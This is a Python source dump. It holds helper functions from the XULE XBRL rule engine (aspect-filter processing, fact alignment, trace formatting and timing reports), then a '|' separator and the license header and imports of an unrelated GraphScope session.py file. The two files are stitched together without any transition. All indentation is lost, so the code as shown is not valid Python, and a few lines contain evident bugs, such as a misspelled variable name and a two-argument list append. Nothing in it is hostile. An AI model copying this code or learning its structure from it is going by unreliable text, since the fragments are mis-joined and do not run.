# member_rs = evaluate(aspect_filter.aspectExpr[0], xule_context)
# non_align_aspects[('explicit_dimension', aspect_filter_qname, None, aspect_filter.aspectOperator)] = member_rs
# add_aspect_var(aspect_vars, 'explicit_dimension', aspect_filter_qname, aspect_var_name, aspect_filter['node_id'], xule_context)
return (non_align_aspects, align_aspects, aspect_vars)
def aspect_in_filters(aspect_type, aspect_name, filters):
"""Checks if an aspect is in the existing set of filters
Arguments:
aspect_type (string): Either 'builtin' or 'dimension'
aspect_name (string or qname): if 'builtin' this will be a string with values of 'concept', 'unit', 'period', 'entity' or 'cube', otherwise it is a qname
of the dimensional aspect name.
filters (dictionary): Dictionary of aspect filters.
"""
for filter_type, filter_name, _x, _y, _z in filters:
if filter_type == aspect_type and filter_name == aspect_name:
return True
# This will only hit if the aspect was not found in the filters.
return False
def process_aspect_expr(aspect_filter, aspect_type, aspect_name, xule_context):
"""Process the expression on the right side of an aspect filter.
This looks at the aspectExpr for the aspect filter (if there is on). This will return a 2 item tuple of the aspect_info key and
the evaluated aspect expression value.
Arguments:
aspect_filter (dict): AST node for the aspect filter
aspect_type (string): Either 'builtin' or 'explicit_dimension'
xule_context (XuleContext): The processing context
"""
aspect_info = None
aspect_value = None
prop = None
# Properties
if 'propertyName' in aspect_filter:
prop = (aspect_filter['propertyName'],
tuple(evaluate(arg, xule_context).value for arg in aspect_filter.get('propertyArgs', tuple())))
if 'wildcard' in aspect_filter:
if aspect_filter['aspectOperator'] not in ('=', '!='):
raise XuleProcessingError(_("In a factset a '*' can only be used with '=' or '!=', found '{}'".format(
aspect_filter['aspectOperator'] + ' *')), xule_context)
if aspect_filter['aspectOperator'] == '=':
aspect_info = (aspect_type, aspect_name, aspect_filter['wildcard'], aspect_filter['aspectOperator'], prop)
aspect_value = XuleValue(xule_context, None, 'none')
else:
# This is aspect_name != *. Really this is the fact does not have this aspect (this aspect is in the default)
aspect_info = (aspect_type, aspect_name, None, '=', prop)
aspect_value = XuleValue(xule_context, None, 'none')
else:
# Not a wildcard
aspect_info = (aspect_type, aspect_name, None, aspect_filter.get('aspectOperator'), prop)
if 'aspectExpr' in aspect_filter:
aspect_value = evaluate(aspect_filter['aspectExpr'], xule_context)
if aspect_type == 'explicit_dimension':
aspect_value = fix_for_default_member(aspect_name, aspect_value, xule_context)
else:
aspect_value = None # There is nothing to filter, but the aspect info will be used for handling alignment
return (aspect_info, aspect_value)
def fix_for_default_member(dim, aspect_value, xule_context):
''' If the member for an explicit dimension is the default member, change the value to none'''
default_name = XuleDimensionCube.dimension_defaults_by_name(xule_context.model).get(dim)
if default_name is None:
return aspect_value
new_values = list()
for mem in aspect_value.value if aspect_value.type in ('list', 'set') else (aspect_value,):
if mem.type == 'concept':
mem_qname = mem.value.qname
elif mem.type == 'qname':
mem_qname = mem.value
else:
new_values.append(mem)
continue
if mem_qname == default_name:
new_values.append(XuleValue(xule_context, None, 'none'))
else:
new_values.append(mem)
if aspect_value.type == 'set':
return XuleValue(xule_context, frozenset(new_values), 'set')
elif aspect_value.type == 'list':
return XuleValue(xule_context, tuple(new_values), 'list')
else:
return new_values[0]
def add_aspect_var(aspect_vars, aspect_type, aspect_name, var_name, aspect_index, xule_context):
if var_name:
if var_name in aspect_vars:
raise XuleProcessingError(
_("Found multiple aspects with same variable name '%s' in a factset." % (var_name)), xule_context)
else:
aspect_vars[var_name] = (aspect_type, aspect_name, aspect_index)
def convert_value_to_qname(value, xule_context):
if value.type == 'concept':
return value.value.qname
elif value.type == 'qname':
return value.value
elif value.type in ('unbound', 'none'):
return None
else:
raise XuleProcessingError(
_("The value for a line item or dimension must be a qname or concept, found '%s'." % value.type),
xule_context)
def convert_value_to_role(value, xule_context):
if value.type in ('string', 'uri'):
return value.value
elif value.type == 'qname':
return XuleUtility.resolve_role(value, 'role', xule_context.model, xule_context)
elif value.type == 'role':
return value.value.roleURI
elif value.type in ('unbound', 'none'):
return None
else:
raise XuleProcessingError(
_("The value for a role or arc role must be a string, uri or short role name, found '%s'." % value.type),
xule_context)
def convert_value_to_model_period(value, xule_context):
if value.type in ('unbound', 'none'):
return None
if value.from_model:
return value.value
else:
# need to adjust instant and end_date. The model has instant and end dates of the next day because python treats midnight as the begining of the day.
if value.type == 'instant':
return value.value + datetime.timedelta(days=1)
elif value.type == 'duration':
if value.value[0] == datetime.datetime.min and value.value[1] == datetime.datetime.max:
# this is forever, don't do anything
return value.value
else:
return (value.value[0], value.value[1] + datetime.timedelta(days=1))
else:
raise XuleProcessingError(
_("Converting result to a period, expected 'instant' or 'duration' but found '%s'" % value.type),
xule_context)
def convert_value_to_model_unit(value, xule_context):
if value.type == 'unit':
return value.value
elif value.type == 'qname':
# A xule 'unit' is a tuple
return ((value.value,), tuple())
# def get_used_vars(xule_context, var_ids):
# return {var_id: xule_context.vars.get(var_id) for var_id in var_ids}
def match_function_arguments(reference, declaration, xule_context):
''' This function matches the arguments on the function reference (call) to the function declaration.
It returns a list of matched arguments as a dictionary.
'''
if len(reference['functionArgs']) != len(declaration['functionArgs']):
raise XuleProcessingError(_("Function call for '%s' has mismatched arguments." % reference['functionName']),
xule_context)
else:
matched = []
for i in range(len(reference['functionArgs'])):
arg_name = declaration['functionArgs'][i]['argName']
matched.append({"name": arg_name,
"node_id": declaration['functionArgs'][i]['node_id'],
"expr": reference['functionArgs'][i],
"tagged": declaration['functionArgs'][i].get('tagged', False)})
return matched
def remove_from_alignment(alignment, remove_aspects, xule_context):
unfrozen_alignment = {k: v for k, v in alignment}
for aspect_key in remove_aspects:
if aspect_key in unfrozen_alignment:
del unfrozen_alignment[aspect_key]
new_alignment = frozenset(unfrozen_alignment.items())
return new_alignment
def alignment_to_aspect_info(alignment, xule_context):
aspect_dict = {}
for align_key, align_value in alignment.items():
aspect_info = (align_key[0], align_key[1], None, '=', None)
if align_key[0] == 'builtin':
if align_key[1] == 'concept':
aspect_value = XuleValue(xule_context, align_value, 'qname')
elif align_key[1] == 'unit':
aspect_value = XuleValue(xule_context, align_value, 'unit')
elif align_key[1] == 'period':
period_value = align_value
if isinstance(period_value, tuple):
if period_value[1] == datetime.datetime.max:
# this is forever
aspect_value = XuleValue(xule_context, period_value, 'duration', from_model=True)
else:
# need to adjust the end date
# aspect_value = XuleResultSet(XuleResult((period_value[0],
# period_value[1] - datetime.timedelta(days=1))
# ,'duration'))
aspect_value = XuleValue(xule_context, (period_value[0],
period_value[1])
, 'duration',
from_model=True)
else:
# need to adjust the date. This is from the model which handles midnight (end of day) as beginning of next day.
# aspect_value = XuleResultSet(XuleResult(period_value - datetime.timedelta(days=1), 'instant'))
aspect_value = XuleValue(xule_context, period_value, 'instant', from_model=True)
elif align_key[1] == 'entity':
aspect_value = XuleValue(xule_context, align_value, 'entity')
else:
raise XuleProcessingError(_("Unknown built in aspect '%s'" % align_key[1]), xule_context)
elif align_key[0] == 'explicit_dimension':
aspect_value = XuleValue(xule_context, align_value, model_to_xule_type(xule_context, align_value))
else:
raise XuleProcessingError(_("Unknown aspect type '%s'" % align_key[0]), xule_context)
aspect_dict[aspect_info] = aspect_value
return aspect_dict
def sugar_trace(value, rule_part, xule_context):
part_name = rule_part['exprName']
if part_name == 'forExpr':
return (rule_part['forLoopExpr']['forVar'],)
elif part_name == 'varRef':
return (rule_part['varName'],)
elif part_name == 'functionReference':
function_info = xule_context.find_function(rule_part['functionName'])
if function_info is None:
return (rule_part['functionName'], tuple())
else:
args = tuple([x.argName for x in function_info['function_declaration']['functionArgs']])
return (rule_part['functionName'], args)
elif part_name == 'factset':
return (value,)
else:
return tuple()
def format_trace(xule_context):
trace_string = ""
for step in xule_context.trace:
trace_string += " " * step[0] + step[3].format_value() + format_trace_info(step[1], step[2], {},
xule_context) + "\n"
return trace_string
def format_trace_info(expr_name, sugar, common_aspects, xule_context):
trace_info = ""
if expr_name == 'forExpr':
trace_info += 'for ($%s)' % sugar[0]
elif expr_name == 'ifExpr':
trace_info += 'if'
elif expr_name == 'varRef':
trace_info += 'var ($%s)' % sugar[0]
elif expr_name == 'functionReference':
if len(sugar[1]) == 0:
args = "..."
else:
args = ",".join(sugar[1])
trace_info += '%s(%s)' % (sugar[0], args)
elif expr_name == 'addExpr':
trace_info += 'add/subtract'
elif expr_name == 'multExpr':
trace_info += 'multiply/divide'
elif expr_name == 'compExpr':
trace_info += 'comparison'
elif expr_name == 'andExpr':
trace_info += 'and'
elif expr_name == 'orExpr':
trace_info += 'or'
elif expr_name == 'property':
trace_info += "::%s" % sugar[0]
elif expr_name == 'factset':
if sugar[0].fact is not None:
fact_context = get_uncommon_aspects(sugar[0].fact, common_aspects, xule_context)
trace_info = 'factset '
if ('builtin', 'concept') not in fact_context:
trace_info += str(sugar[0].qname) + " "
trace_info += format_alignment(fact_context, xule_context)
else:
trace_info += expr_name
if len(trace_info) > 0:
trace_info = " - " + trace_info
return trace_info
def result_message(rule_ast, result_ast, xule_value, xule_context):
# validate_result_name(result_ast, xule_context)
message_context = xule_context.create_message_copy(rule_ast['node_id'], xule_context.get_processing_id(rule_ast['node_id']))
message_context.tags['rule-value'] = xule_value
try:
# Caching does not work for expressions with tagRefs. The The results portion of a rule will have a tagRef for each varRef. This conversion is
# done during the post parse step. So it is neccessary to turn local caching off when evaluating the result expression. There is a command line option
# for doing this. This code will turn this command line option on.
saved_no_cache = getattr(message_context.global_context.options, 'xule_no_cache', False)
# if hasattr(message_context.global_context.options, 'xule_no_cache'):
# xule_context.global_context.options.xule_no_cache = True
xule_context.global_context.options.xule_no_cache = True
message_value = evaluate(result_ast['resultExpr'], message_context)
except XuleIterationStop as xis:
raise XuleProcessingError(_("Cannot produce message. An expression in the message has a skip value."),
xule_context)
finally:
# if hasattr(message_context.global_context.options, 'xule_no_cache'):
#
xule_context.global_context.options.xule_no_cache = saved_no_cache
if result_ast['resultName'] == 'rule-focus':
# This is a special case. rule-focus requires some kind of a ModelObject. This will be passed to the logger as the modelObject argument.
# Xule will allow a ModelFact or a ModelConcept
if message_value.type == 'concept':
message = message_value.value
elif message_value.is_fact:
message = message_value.fact
elif message_value.type in ('list','set'):
# The rule focus is a list/set of concepts or facts. The list/set cannot be nested
message = []
for rule_focus_item in message_value.value:
if rule_focus_item.type == 'concept':
message.append(rule_focus_item.value)
elif rule_focus_item.is_fact:
message.append(rule_focus_item.fact)
elif rule_focus_item.type in ('unbound', 'none'):
message.append(None)
else:
raise XuleProcessingError(
_("The rule-focus of a rule must be a concept or a fact, found {}".format(rule_focus_item.type)),
xule_context)
elif message_value.type in ('unbound', 'none'):
message = None
else:
raise XuleProcessingError(
_("The rule-focus of a rule must be a concept or a fact, found {}".format(message_value.type)),
xule_context)
elif result_ast['resultName'] == 'message':
if message_value.type == 'unbound':
message = XuleValue(xule_context, '', 'string')
else:
message = message_value
else:
if message_value.type == 'unbound':
message = ''
else:
message = str(message_value.value)
return message
def validate_result_name(result, xule_context):
if result['resultName'] not in ('message', 'severity', 'rule-suffix', 'rule-focus'):
if not xule_context.rule_set.hasOutputAttribute(result['resultName']):
raise XuleProcessingError(_(
"Rule '{}' uses result name '{}' which does not have an output-attribute declaration.".format(
xule_context.rule_name, result['resultName'])))
def get_all_aspects(model_fact, xule_context):
'''This function gets all the apsects of a fact'''
return get_alignment(model_fact, {}, {}, xule_context)
def get_alignment(model_fact, non_align_aspects, align_aspects, xule_context, covered_dims=False, covered=False):
'''The alignment contains the aspect/member pairs that are in the fact but not in the non_align_aspects.
The alignment is done in two steps. First check each of the builtin aspects. Then check the dimesnions.'''
'''non_align_aspect - dictionary
Key is a tuple with the following parts:
0 = TYPE -'builtin' or 'explicit_dimension',
1 = ASPECT - aspect,
2 = SPECIALVALUE - 'all' or 'allWithDefault',
value = MEMBER (None if there is a SPECIAL_VALUE)'''
alignment = {}
# builtin alignment
if covered:
# Don't need the non_align_builtins, so don't bother creating them.
non_align_builtins = None
else:
non_align_builtins = {aspect_info[ASPECT] for aspect_info in non_align_aspects if aspect_info[TYPE] == 'builtin'}
align_builtins = {aspect_info[ASPECT] for aspect_info in align_aspects if aspect_info[TYPE] == 'builtin'}
# Only need to go through the builtins if they are not covered or they are covered and there are
# aligned builtins
if not covered or len(align_builtins) > 0:
# lineItem
if (not covered and 'concept' not in non_align_builtins) or 'concept' in align_builtins:
alignment[('builtin', 'concept')] = model_fact.qname
# alignment[('builtin', 'concept')] = model_fact.elementQname
# unit
if model_fact.isNumeric:
if (not covered and 'unit' not in non_align_builtins) or 'unit' in align_builtins:
alignment[('builtin', 'unit')] = model_to_xule_unit(model_fact.unit, xule_context)
# period
if (not covered and 'period' not in non_align_builtins) or 'period' in align_builtins:
alignment[('builtin', 'period')] = model_to_xule_period(model_fact.context, xule_context)
# entity
if (not covered and 'entity' not in non_align_builtins) or 'entity' in align_builtins:
alignment[('builtin', 'entity')] = model_to_xule_entity(model_fact.context, xule_context)
# dimensional apsects
if covered_dims or covered:
# Non algined dimensions don't matter.
non_align_dimesnions = set()
else:
non_align_dimensions = {aspect_info[ASPECT] for aspect_info in non_align_aspects if
aspect_info[TYPE] == 'explicit_dimension'}
align_dimensions = {aspect_info[ASPECT] for aspect_info in align_aspects if
aspect_info[TYPE] == 'explicit_dimension'}
# Only need to run through the dimensions if they are included or if they are not included there are
# aligned dimensions
if (not covered_dims and not covered) or len(align_dimensions) > 0:
for fact_dimension_qname, dimension_value in model_fact.context.qnameDims.items():
if (not covered_dims and not covered and fact_dimension_qname not in non_align_dimensions) or fact_dimension_qname in align_dimensions:
alignment[('explicit_dimension', # This will included typed dimensions as well as explicit.
fact_dimension_qname)] = dimension_value.memberQname if dimension_value.isExplicit else dimension_value.typedMember.xValue
return alignment
def get_uncommon_aspects(model_fact, common_aspects, xule_context):
uncommon_aspects = {}
fact_aspects = get_all_aspects(model_fact, xule_context)
for aspect_info, aspect_value in fact_aspects.items():
if aspect_info == ('builtin', 'concept'):
uncommon_aspects[aspect_info] = aspect_value
elif aspect_info not in common_aspects:
uncommon_aspects[aspect_info] = aspect_value
return uncommon_aspects
def format_alignment(aspects, xule_context):
if len(aspects) == 0:
return ''
aspect_strings = []
line_item_string = ""
# built in aspects
if ('builtin', 'concept') in aspects:
line_item_string = format_qname(aspects[('builtin', 'concept')], xule_context)
if ('builtin', 'period') in aspects:
period_info = aspects[('builtin', 'period')]
if isinstance(period_info, tuple):
if period_info[0] == datetime.datetime.min and period_info[1] == datetime.datetime.max:
aspect_strings.append("period=forever")
else:
aspect_strings.append("period=duration('%s', '%s')" % (period_info[0].strftime("%Y-%m-%d"), (
period_info[1] - datetime.timedelta(days=1)).strftime("%Y-%m-%d")))
else:
aspect_strings.append(
"period=instant('%s')" % (period_info - datetime.timedelta(days=1)).strftime("%Y-%m-%d"))
if ('builtin', 'unit') in aspects:
model_unit = aspects[('builtin', 'unit')]
aspect_strings.append(str(model_unit))
# if len(model_unit[1]) == 0:
# #no denominator
# aspect_strings.append("unit=%s" % " * ".join([x.localName for x in model_unit[0]]))
# else:
# aspect_strings.append("unit=%s/%s" % (" * ".join([x.localName for x in model_unit[0]]),
# " * ".join([x.localName for x in model_unit[1]])))
if ('builtin', 'entity') in aspects:
entity_info = aspects[('builtin', 'entity')]
aspect_strings.append("entity=(%s) %s" % (entity_info[0], entity_info[1]))
# dimensions
dimension_aspects = [(aspect_info[ASPECT], aspect_info, aspect_member) for aspect_info, aspect_member in
aspects.items() if aspect_info[TYPE] == 'explicit_dimension']
# sort by the dimension qname
dimension_aspects.sort(key=lambda tup: tup[0])
# for aspect_info, aspect_member in aspects.items():
for dimension_aspect in dimension_aspects:
aspect_info = dimension_aspect[1]
aspect_member = dimension_aspect[2]
if aspect_info[TYPE] == 'explicit_dimension':
aspect_member = aspects[aspect_info]
'''THE formatted_member SHOULD HANDLE FORMATTING OF NON QNAME VALUES'''
formatted_member = format_qname(aspect_member, xule_context) if type(
aspect_member) == QName else aspect_member
aspect_strings.append("%s=%s" % (format_qname(aspect_info[ASPECT], xule_context), formatted_member))
if len(aspect_strings) > 0:
aspect_string = "[" + ",\n".join(aspect_strings) + "]"
else:
aspect_string = ""
return line_item_string + aspect_string
def format_fact_line_item(xule_context, xule_fact):
return format_qname(xule_fact.fact.concept.qname, xule_context)
def format_fact_period(xule_context, xule_fact):
if xule_fact.fact.context.isStartEndPeriod:
period_string = xule_fact.fact.context.startDatetime.strftime("%m/%d/%Y") + " - " + (
xule_fact.fact.context.endDatetime - datetime.timedelta(days=1)).strftime("%m/%d/%Y")
elif xule_fact.fact.context.isInstantPeriod:
period_string = (xule_fact.fact.context.endDatetime - datetime.timedelta(days=1)).strftime("%m/%d/%Y")
else:
period_string = "Forever"
return period_string
def format_fact_unit(xule_context, xule_fact):
if xule_fact.fact.isNumeric:
numerator = tuple(sorted(xule_fact.fact.unit.measures[0]))
denominator = tuple(sorted(xule_fact.fact.unit.measures[1]))
if len(denominator) == 0:
# no denominator
return " * ".join([x.localName for x in numerator])
else:
return "%s/%s" % (" * ".join([x.localName for x in numerator]),
" * ".join([x.localName for x in denominator]))
else:
return None
def format_fact_all_aspects(xule_context, xule_fact):
aspect_strings = ["Line Item: " + format_fact_line_item(xule_context, xule_fact), ]
aspect_strings.append("Period: " + format_fact_period(xule_context, xule_fact))
unit = format_fact_unit(xule_context, xule_fact)
if unit is not None:
aspect_strings.append("Unit: " + unit)
dimensions = format_fact_dimensions(xule_context, xule_fact)
if dimensions is not None:
aspect_strings.append("Dimensions:\n" + dimensions)
return "\n".join(aspect_strings)
def format_fact_dimensions(xule_context, xule_fact):
if len(xule_fact.fact.context.qnameDims) > 0:
dim_pairs = []
for axis_qname in sorted(xule_fact.fact.context.qnameDims):
dim_pairs.append(format_qname(axis_qname, xule_context) + " = " + format_qname(
xule_fact.fact.context.qnameDims[axis_qname].memberQname, xule_context))
return "\n".join(dim_pairs)
else:
return None
def format_fact_label(xule_context, fact):
label = property_label(xule_context, fact)
if label.type in ('unbound', 'none'):
return "missing"
else:
return label.value.textValue
def format_qname(qname, xule_context):
cat_namespace = xule_context.rule_set.getNamespaceInfoByUri(qname.namespaceURI)
if cat_namespace:
if cat_namespace['prefix'] == '*':
return qname.localName
else:
return cat_namespace['prefix'] + ":" + qname.localName
else:
return str(qname)
MESSAGE_TAG_SUB_PARTS = (('context', format_alignment),
('label', format_fact_label),
('concept', format_fact_line_item),
('period', format_fact_period),
('unit', format_fact_unit),
('aspects', format_fact_all_aspects),
('dimensions', format_fact_dimensions)
)
def write_trace_count_string(trace_count_file, rule_name, traces, rule_part, total_iterations, total_time):
display_string = display_trace_count(traces, rule_part, total_iterations, total_time)
with open(trace_count_file + ".txt", 'a', newline='') as o:
o.write(display_string)
def display_trace_count(traces, rule_part, total_iterations, total_time, level=0, display_string=""):
if isinstance(rule_part, ParseResults):
additional = ''
if rule_part['exprName'] == 'varRef':
if rule_part.is_constant:
additional = " ($" + rule_part.varName + " declaration: " + str(
rule_part.var_declaration) + ") - constant)"
else:
additional = " ($" + rule_part.varName + " declaration: " + str(rule_part.var_declaration) + ")"
elif rule_part['exprName'] == 'varAssign':
additional = " (" + rule_part.varName + ")" + (" NOT USED" if rule_part.get('not_used') == True else "")
elif rule_part['exprName'] == 'constantAssign':
additional = " (" + rule_part.constantName + ")"
elif rule_part['exprName'] == 'functionArg':
additional = " (" + rule_part.argName + ")"
elif rule_part['exprName'] == 'forExpr':
additional = " (" + rule_part.forControl.forVar + ")"
elif rule_part['exprName'] == 'reportDeclaration':
additional = " (" + rule_part.reportName + ")"
elif rule_part['exprName'] == 'raiseDeclaration':
additional = " (" + rule_part.raiseName + ")"
elif rule_part['exprName'] == 'formulaDeclaration':
additional = " (" + rule_part.formulaName + ")"
# elif rule_part['exprName'] in ('functionDeclaration', 'functionReference'):
# additional = " (" + rule_part.functionName + ")" + (" CACHEABLE" if rule_part.get('cacheable') == True else "")
if rule_part.number != '':
additional += (" [" +
('i, ' if rule_part.get('instance') else '') +
('r, ' if rule_part.get('rules-taxonomy') else '') +
('1' if rule_part.number == 'single' else "*") +
(", Align" if rule_part.has_alignment else ", NoAlign") +
((", " + ("D" if rule_part.is_dependent else "I")) if 'is_dependent' in rule_part else "") +
# ((", " + str(parse_res.var_refs)) if len(parse_res.var_refs) > 0 else "") +
# ((", v" + str({(x[0], x[1]) for x in rule_part.dependent_vars})) if len(rule_part.dependent_vars) > 0 else "") +
# ((", V" + str({(x[0], x[1]) for x in rule_part.var_refs})) if len(rule_part.var_refs) > 0 else "") +
# ((", VIds" + str(rule_part.var_ref_ids)) if 'var_ref_ids' in rule_part else "") +
((", i" + str({dep['node_id'] for dep in rule_part.dependent_iterables})) if len(
rule_part.dependent_iterables) > 0 else "") +
# ((", di" + str({dep['node_id'] for dep in rule_part.downstream_iterables})) if len(rule_part.downstream_iterables) > 0 else "") +
(", Values" if rule_part.get('values_expression') == True else "") +
(", Table %i" % rule_part.table_id if rule_part.get('table_id') is not None else "") +
"]")
if 'is_iterable' in rule_part:
additional += " iterable"
if 'in_loop' in rule_part:
additional += " LOOP"
display_string += (" " * level) + str(rule_part['node_id']) + ":" + rule_part['exprName'] + additional + "\n"
if rule_part['node_id'] in traces:
trace = traces[rule_part['node_id']]
total_count = 0
# display_string += ", ".join(trace.keys()) + "\n"
for key in ('iterations', 'U', 'E', 'c', 'T', 'e', 'R', 'r', 'isE', 'ise', 'isu', 'ex'):
if trace[key] > 0:
if key == 'iterations':
display_string += "{}{} {} {}\n".format(" " * (level + 1),
key,
trace[key],
(trace[
key] / total_iterations) if total_iterations > 0 else 0)
# add step values
children_time, child_nodes = trace_count_next_time(rule_part, traces)
step_time = trace['iterations-t'] - children_time
display_string += "{}{} {} {} {}\n".format(" " * (level + 1),
"Step",
step_time.total_seconds(),
(
step_time / total_time) if total_time.total_seconds() > 0 else 0,
str(child_nodes)[1:-1])
else:
try:
display_string += "{}{} {} - Avg: {} Tot: {} - Avg: {:%} Tot: {:%}\n".format(
" " * (level + 2),
key,
trace[key],
trace[key + '-t'].total_seconds() / trace[key] if trace[key] > 0 else 0,
trace[key + '-t'].total_seconds(),
((trace[key + '-t'].total_seconds() / trace[key] if trace[
key] > 0 else 0) / total_iterations) if total_iterations > 0 else 0,
(trace[key + '-t'] / total_time) if total_time.total_seconds() > 0 else 0)
except:
print("key", key, "key time", trace[key + '-t'])
raise
if key != 'iterations':
total_count += trace[key]
if total_count != trace['iterations']:
display_string += "%sCalc Total %i\n" % (" " * (level + 1), total_count)
display_string += "%sTime %f Average %f\n\n" % (" " * (level + 1), trace['iterations-t'].total_seconds(), (
trace['iterations-t'].total_seconds() / total_count) if total_count > 0 else 0)
for next_part in rule_part:
display_string = display_trace_count(traces, next_part, total_iterations, total_time, level + 1,
display_string)
return display_string
def write_trace_count_csv(trace_count_file, rule_name, traces, rule_part, total_iterations, total_time):
import csv
trace_count = calc_trace_count(rule_name, traces, rule_part, total_iterations, total_time)
with open(trace_count_file + ".csv", 'a', newline='') as o:
csv_writer = csv.writer(o)
csv_writer.writerows(trace_count)
def calc_trace_count(rule_name, traces, rule_part, total_iterations, total_time, level=0, rows=None):
if rows is None:
rows = [['', '', '', '', '', '', '', '', '', '', ''
, 'Total', '', '', '', '', '' # total iteraions
, 'Step', '', '', '', '' # Step time
, 'Evaluations', '', '', '', '', '' # Evaluations
, 'Table', '', '', '', '', '' # Table
, 'Cache', '', '', '', '', '' # cache
, 'Recalc', '', '', '', '', '' # Recalc
, 'Stop', '', '', '', '', '' # Iteration Stop
],
['Rule', 'Id', 'Name', 'Notes', 'Instance', 'Rule Taxonomy', 'Number', 'Aligned', 'Dependent',
'Dependent Iterables', 'Iterable'
, 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %' # total iteraions
, 'secs', 'secs %', 'avg', 'avg %', 'nodes' # step times
, 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %' # Evaluations
, 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %' # Table
, 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %' # cache
, 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %' # Recalc
, 'it', 'it %', 'secs', 'secs %', 'avg', 'avg %' # Iteration Stop
]]
# Rows: name, notes, inst, rule tax, number, aligned, dependency, dependent iterables, iterable,
# For each count includes: iterations, percent, time, percent, avg time, percent
# total, E, T, c, R, is
if isinstance(rule_part, ParseResults):
additional = ''
if rule_part['exprName'] == 'varRef':
if rule_part.is_constant:
additional = "$" + rule_part.varName + " declaration: " + str(
rule_part.var_declaration) + " - constant)"
else:
additional = "$" + rule_part.varName + " declaration: " + str(rule_part.var_declaration)
elif rule_part['exprName'] == 'varAssign':
additional = rule_part.varName + (" NOT USED" if rule_part.get('not_used') == True else "")
elif rule_part['exprName'] == 'constantAssign':
additional = rule_part.constantName
elif rule_part['exprName'] == 'functionArg':
additional = rule_part.argName
elif rule_part['exprName'] == 'forExpr':
additional = rule_part.forControl.forVar
elif rule_part['exprName'] == 'reportDeclaration':
additional = rule_part.reportName
elif rule_part['exprName'] == 'raiseDeclaration':
additional = rule_part.raiseName
elif rule_part['exprName'] == 'formulaDeclaration':
additional = rule_part.formulaName
elif rule_part['exprName'] in ('functionDeclaration', 'functionReference'):
additional = rule_part.functionName + (" CACHEABLE" if rule_part.get('cacheable') == True else "")
row = [rule_name
, rule_part['node_id']
, (' ' * level) + rule_part['exprName'] # name
, additional # notes
, True if rule_part.get('instance') else False # instance
, True if rule_part.get('rules-taxonomy') else False # rule taxonomy
, rule_part.number == 'single' # nubmer
, True if rule_part.has_alignment else False # aligned
, ("D" if rule_part.is_dependent else "I") if 'is_dependent' in rule_part else "" # dependency
, str({dep['node_id'] for dep in rule_part.dependent_iterables}) if len(
rule_part.dependent_iterables) > 0 else "" # dependent iterables
, 'is_iterable' in rule_part # iterable
]
if rule_part['node_id'] in traces:
trace = traces[rule_part['node_id']]
# add total values to the row
row += trace_count_by_type('iterations', trace, total_iterations, total_time)
# add step values
children_time, child_nodes = trace_count_next_time(rule_part, traces)
step_time = trace['iterations-t'] - children_time
row += [step_time.total_seconds()
, ((
step_time.total_seconds() / total_time.total_seconds()) if total_time.total_seconds() > 0 else 0) * 100
, (step_time.total_seconds() / trace['iterations']) if trace['iterations'] > 0 else 0
, ((((step_time.total_seconds() / trace['iterations']) if trace[
'iterations'] > 0 else 0) / total_iterations) if total_iterations > 0 else 0) * 100
, str(child_nodes)[1:-1]]
# row += ['','','','','']
# add values by evaluation type
calc_total = 0
for count_codes in [['E', 'e'], ['T'], ['c'], ['R', 'r'], ['isE', 'ise']]:
if len(count_codes) == 1:
count_code = count_codes[0]
else:
count_code = count_codes[0] if trace[count_codes[0]] != 0 else count_codes[1]
calc_total += trace[count_code]
row += trace_count_by_type(count_code, trace, total_iterations, total_time)
if calc_total != trace['iterations']:
row.append("ITERATION COUNT DOES NOT TOTAL. Calc total is", calc_total)
rows.append(row)
for next_part in rule_part:
rows = calc_trace_count(rule_name, traces, next_part, total_iterations, total_time, level + 1, rows)
return rows
def trace_count_by_type(count_code, trace, total_iterations, total_time):
time_code = count_code + '-t'
return [trace[count_code]
, ''
, trace[time_code].total_seconds()
, (trace[time_code].total_seconds() / total_time.total_seconds() * 100) if total_time.total_seconds() > 0 else 0
, (trace[time_code].total_seconds() / trace[count_code]) if trace[count_code] > 0 else 0
, (((trace[time_code].total_seconds() / trace[count_code] if trace[
count_code] > 0 else 0) / total_iterations) if total_iterations > 0 else 0) * 100
]
def trace_count_next_time(rule_part, traces):
total_child_times = datetime.timedelta()
total_child_nodes = []
if isinstance(rule_part, ParseResults):
for child in rule_part:
if isinstance(child, ParseResults):
if child['exprName'] != 'varAssign':
if child['node_id'] in traces:
total_child_times += traces[child['node_id']]['iterations-t']
total_child_nodes.append(child['node_id'])
# return (traces[child['node_id']]['iterations-t'], child['node_id'])
else:
child_info = trace_count_next_time(child, traces)
total_child_times += child_info[0]
total_child_nodes += child_info[1]
return (total_child_times, total_child_nodes)
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import json
import logging
import os
import pickle
import signal
import sys
import threading
import time
import uuid
import warnings
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import SignalIgnore
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
